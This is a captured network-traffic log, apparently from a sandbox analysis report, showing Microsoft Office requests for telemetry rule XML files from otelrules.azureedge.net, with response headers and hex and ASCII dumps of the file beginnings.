                                                                                                                    ETag: "0x8DC582BE017CAD3"
                                                                                                                    x-ms-request-id: 955e63b0-601e-0070-4f22-41a0c9000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103543Z-174f7845968psccphC1EWRuz9s00000011ng000000001pra
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:43 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    127192.168.2.44987713.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:43 UTC192OUTGET /rules/rule702951v1s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:44 UTC494INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:44 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 1405
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                    ETag: "0x8DC582BE12B5C71"
                                                                                                                    x-ms-request-id: fdde8523-d01e-0028-578c-3f7896000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103544Z-174f78459685m244hC1EWRgp2c000000115g000000003r3v
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:44 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    128192.168.2.44987813.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:43 UTC192OUTGET /rules/rule702950v1s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:44 UTC494INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:44 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 1368
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                    ETag: "0x8DC582BDDC22447"
                                                                                                                    x-ms-request-id: e544c55f-801e-0083-3181-3ff0ae000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103544Z-174f78459688l8rvhC1EWRtzr00000000dxg000000004agt
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:44 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    129192.168.2.44987913.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:44 UTC192OUTGET /rules/rule701151v1s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:44 UTC494INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:44 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 1401
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                    ETag: "0x8DC582BE055B528"
                                                                                                                    x-ms-request-id: f5d1acec-801e-0078-3322-41bac6000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103544Z-174f78459685726chC1EWRsnbg00000011b0000000004uxf
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:44 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    130192.168.2.44988113.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:45 UTC192OUTGET /rules/rule702201v1s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:46 UTC494INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:45 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 1397
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                                                                                                                    ETag: "0x8DC582BE7262739"
                                                                                                                    x-ms-request-id: f1763db6-d01e-007a-27fe-41f38c000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103545Z-174f78459688l8rvhC1EWRtzr00000000dvg00000000692k
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:46 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    131192.168.2.44988313.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:45 UTC192OUTGET /rules/rule700401v2s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:46 UTC494INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:46 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 1403
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                    ETag: "0x8DC582BDCB4853F"
                                                                                                                    x-ms-request-id: 580008bf-301e-0000-1d8a-3feecc000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103546Z-174f7845968zgtf6hC1EWRqd8s0000000ubg000000000xaa
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:46 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    132192.168.2.44988413.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:46 UTC192OUTGET /rules/rule700400v2s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:47 UTC494INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:46 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 1366
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                    ETag: "0x8DC582BDB779FC3"
                                                                                                                    x-ms-request-id: 78026cae-d01e-0082-044f-41e489000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103546Z-174f7845968jrjrxhC1EWRmmrs00000011hg000000000zzu
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:47 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    133192.168.2.44988513.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:47 UTC192OUTGET /rules/rule700351v1s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:48 UTC494INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:48 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 1397
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                    ETag: "0x8DC582BDFD43C07"
                                                                                                                    x-ms-request-id: 6e1934d2-a01e-006f-595c-3f13cd000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103548Z-174f7845968xr5c2hC1EWRd0hn0000000k40000000006708
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:48 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    134192.168.2.44988613.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:48 UTC192OUTGET /rules/rule700350v1s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:48 UTC494INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:48 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 1360
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                    ETag: "0x8DC582BDD74D2EC"
                                                                                                                    x-ms-request-id: 9b9719a8-201e-0033-3491-3fb167000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103548Z-174f7845968kvnqxhC1EWRmf3g0000000n20000000007b89
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:48 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    135192.168.2.44988713.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:48 UTC192OUTGET /rules/rule703901v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:49 UTC494INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:49 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 1427
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                    ETag: "0x8DC582BE56F6873"
                                                                                                                    x-ms-request-id: ab6eb442-501e-0035-0e91-3fc923000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103549Z-174f7845968kdththC1EWRzvxn0000000dqg0000000030m6
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:49 UTC1427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    136192.168.2.44988213.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:49 UTC192OUTGET /rules/rule702200v1s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:49 UTC494INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:49 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 1360
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                    ETag: "0x8DC582BDDEB5124"
                                                                                                                    x-ms-request-id: b189b901-c01e-0079-3391-3fe51a000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103549Z-174f7845968ljs8phC1EWRe6en00000011400000000069w1
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
